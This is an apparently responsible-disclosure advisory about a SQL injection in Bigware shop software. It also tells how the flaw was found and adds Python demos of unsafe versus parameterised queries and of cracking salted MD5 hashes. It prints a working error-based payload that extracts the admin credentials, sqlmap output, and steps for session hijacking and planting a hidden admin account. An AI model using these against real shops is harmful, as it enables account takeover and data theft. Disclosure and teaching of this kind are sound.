SQL Injection 43.php

Summary main_bigware_43.php

The Bigware shop software prior to version 2.15 contains a SQL injection that leads to full database compromise. The injection point is the POST parameter 'lastname' in the module main_bigware_43.php. Exploitation requires an authenticated shop user, so a user account must be created first.

Proof of concept is at http://files.dw-itsecurity.de/43.zip

To reproduce manually: create a valid user at www.shopsite.com/main_bigware_10.php, open www.shopsite.com/main_bigware_43.php and enter the following statement in the field 'Nachname' (last name):

' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former WHERE former_groups_id LIKE 1 LIMIT 0,1), CHAR(58), (SELECT former_password FROM former WHERE former_groups_id LIKE 1 LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a) AND '1' LIKE '1

The resulting error message contains the e-mail address and the hashed password of the shop administrator (former_groups_id 1), separated by a colon (CHAR(58)). The trick is the classic MySQL double-query technique: grouping by a key that includes the non-deterministic FLOOR(RAND(0)*2) makes MySQL raise a "Duplicate entry ... for key 'group_key'" error, and the text of that error carries the CONCAT() result, so the data is read straight out of the error page.
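The root cause behind that payload is the string-built UPDATE visible in the error messages further down: user input is pasted straight into the statement. The following example is added here and is not code from the advisory or from Bigware; it rebuilds the same UPDATE over an in-memory SQLite table (a stand-in for MySQL, so the MySQL-specific duplicate-key error trick above is not reproduced) and shows the apostrophe probe, a payload that rewrites every row, and the parameterised version that stores the payload as harmless text. The table and column names follow the quoted error messages; the rows and e-mail addresses are constructed.

```python
import sqlite3

# Constructed sample rows (not real shop data). The table and column names
# follow the error messages quoted in the article; the addresses are made up.
SAMPLE_ROWS = [
    ("alice@example.com", "Alpha"),
    ("bob@example.com", "Beta"),
    ("admin@example.com", "Root"),
]

# Attacker input for the 'lastname' field: closes the string literal and
# comments out the WHERE clause, so the UPDATE hits every row.
PAYLOAD = "Pwned' -- "


def make_db():
    """In-memory SQLite stand-in for the shop's MySQL table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE attendees ("
        "attendees_email_address TEXT PRIMARY KEY, attendees_lastname TEXT)"
    )
    conn.executemany("INSERT INTO attendees VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def update_lastname_vulnerable(conn, email, lastname):
    """String-built UPDATE, shaped like the one in the 1064 error message."""
    sql = (
        "update attendees set attendees_lastname = '" + lastname
        + "' where attendees_email_address = '" + email + "'"
    )
    conn.execute(sql)
    conn.commit()
    return sql


def update_lastname_safe(conn, email, lastname):
    """Same statement with bound parameters: input never reaches the SQL parser."""
    conn.execute(
        "UPDATE attendees SET attendees_lastname = ? "
        "WHERE attendees_email_address = ?",
        (lastname, email),
    )
    conn.commit()


def lastnames(conn):
    """Current last name per e-mail address."""
    return dict(
        conn.execute(
            "SELECT attendees_email_address, attendees_lastname FROM attendees"
        )
    )


def run_vulnerable():
    """Returns (did the apostrophe probe raise a syntax error?, rows after the payload)."""
    conn = make_db()
    probe_error = False
    try:
        # Step 1: the apostrophe probe from the story. A bare quote breaks the
        # statement, which is exactly what the shop's 1064 message revealed.
        update_lastname_vulnerable(conn, "bob@example.com", "O'Brien")
    except sqlite3.OperationalError:
        probe_error = True
    # Step 2: a real payload. Only bob's row should change, but every row does.
    update_lastname_vulnerable(conn, "bob@example.com", PAYLOAD)
    return probe_error, lastnames(conn)


def run_safe():
    """The same two inputs through the parameterised version."""
    conn = make_db()
    update_lastname_safe(conn, "bob@example.com", "O'Brien")
    update_lastname_safe(conn, "bob@example.com", PAYLOAD)
    return lastnames(conn)


if __name__ == "__main__":
    print(run_vulnerable())
    print(run_safe())
```

With the vulnerable builder the probe fails with a syntax error and the payload renames all three attendees; with bound parameters the probe is stored as O'Brien and the payload ends up as the literal last name "Pwned' -- " on bob's row only.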

Time line:
12/10/2011: Vendor contacted
12/10/2011: Vendor response
12/18/2011: Vendor patch release
12/19/2011: Vendor requested time to notify customers
01/23/2012: Disclosure

 

How it began

I wanted to buy an item at an online shop. I found what I was looking for, added it to the shopping cart and registered a new user to be able to check out. However, I had a typo in my address, so I logged back in with my user/pass combination and corrected my error. Since I do pentesting and a good friend used to say "Just add an ' from time to time in your requests.", I added an apostrophe in every input field, clicked on 'apply' and looked at:

1064 - You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '@_name name.de''
at line 1 update attendees set attendees_lastname = '@_name'' 
where attendees_email_address = '@_name name.de'

That looked like a possible SQL injection point to me. Just to make sure, I added a small SQL statement and got:

1064 - You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '' where
attendees_email_address = '@_vor.name name.de'' at line 1; update attendees
set attendees_lastname = '@_name' and (select user from mysql.user)' where attendees_email_address = '@_vor.name name.de'

At this point I stopped further investigation and checked the site's Impressum (legal notice) to notify the shop owner. Hold on, what does it say there at the bottom of the site?

Diese Shopsoftware wurde entwickelt von Bigware. ("This shop software was developed by Bigware.")

I googled for bigware and found www.bigware.de, a company in Germany that provides services for its shop software.

 

First impressions

Using the Google dork 'main_bigware_10.php' I found some 500 active installations. The only reported vulnerability is a SQL injection flaw from 2008 (CVE-2008-0498). Further googling revealed the pedigree of Bigware: it is a fork of osCommerce from 2001.

Before I contacted the guys at Bigware I wanted to confirm the vulnerability. Downloading the package from bigware.de and installing it on a virtual machine took only a few minutes. Some time later sqlmap reported:

> python sqlmap.py -r request -p lastname
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: POST
Parameter: lastname
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
and I could access the database.

 

Threat analysis

What can I do with the above vulnerability? I own the database, so I can dump the table 'former' and try to crack the administrator credentials. They are MD5 hashes with a 2-byte salt, so if the shop administrator uses a good password, bad luck for me. Right? Hold on, I also have access to the table 'sessions', which holds all active session IDs. So all I need to do is sit and wait for an administrator to log in, read the session ID from the table, put it in my own cookie and I am logged in as the administrator. To make my life easier, the Bigware shop administration interface includes a nifty file manager and a database dumper. On my way through the database I also discovered that I could add a second administrator in the table 'former', one that is not shown in the shop frontend.
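To make the "2-byte salted md5" remark concrete, here is an added example that is not part of the original write-up or of Bigware's code. It assumes the hash format of osCommerce's tep_encrypt_password(), which Bigware as an osCommerce fork is assumed to have inherited: md5(salt + password) followed by ':' and the two-character salt, with the salt taken from the first two hex digits of an MD5, so it is stored in clear next to the digest. The function names, wordlist and admin passwords below are constructed for the demonstration; a real implementation draws the salt at random, here it is passed in so the results are reproducible.

```python
import hashlib
import itertools
import string


def encrypt_password(plain, salt):
    """osCommerce-style hash: md5(salt + password) + ':' + salt.
    The salt is an argument here (constructed example); the original draws
    two hex characters from the MD5 of a random string."""
    return hashlib.md5((salt + plain).encode("utf-8")).hexdigest() + ":" + salt


def validate_password(plain, stored):
    """Login check: the salt needed to recompute the digest is stored after ':'."""
    digest, _, salt = stored.partition(":")
    return hashlib.md5((salt + plain).encode("utf-8")).hexdigest() == digest


def crack(stored, candidates):
    """Dictionary attack on one stored hash. Because the salt is known, each
    candidate costs exactly one MD5; the salt only defeats precomputed tables."""
    digest, _, salt = stored.partition(":")
    for cand in candidates:
        if hashlib.md5((salt + cand).encode("utf-8")).hexdigest() == digest:
            return cand
    return None


def salt_space():
    """Number of distinct salts the scheme can produce: two lowercase hex
    characters, i.e. 16 * 16. A rainbow table needs only this many variants."""
    return len([a + b for a, b in itertools.product(string.hexdigits[:16], repeat=2)])


# Constructed wordlist; a real attack would use a multi-million-entry list.
WORDLIST = ["123456", "password", "shop2011", "bigware", "admin", "letmein"]


def weak_admin_hash():
    """Constructed record of an administrator with a dictionary password."""
    return encrypt_password("shop2011", "a1")


def strong_admin_hash():
    """Constructed record of an administrator with a non-dictionary password."""
    return encrypt_password("Vx7#pL2q!mR9", "f3")


if __name__ == "__main__":
    print(weak_admin_hash(), "->", crack(weak_admin_hash(), WORDLIST))
    print(strong_admin_hash(), "->", crack(strong_admin_hash(), WORDLIST))
    print("possible salts:", salt_space())
```

The point of the example: the salt buys nothing against a targeted per-hash dictionary attack, and unsalted-speed MD5 means a strong admin password is the only thing standing between a dumped 'former' table and a working admin login, which is why the session table is the more attractive target.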

What is not possible? There is no code execution, no file upload or download, and no additional INSERT or UPDATE statements can be injected, because the input lands inside a single UPDATE statement and stacked queries are not available at this point. Life ain't easy.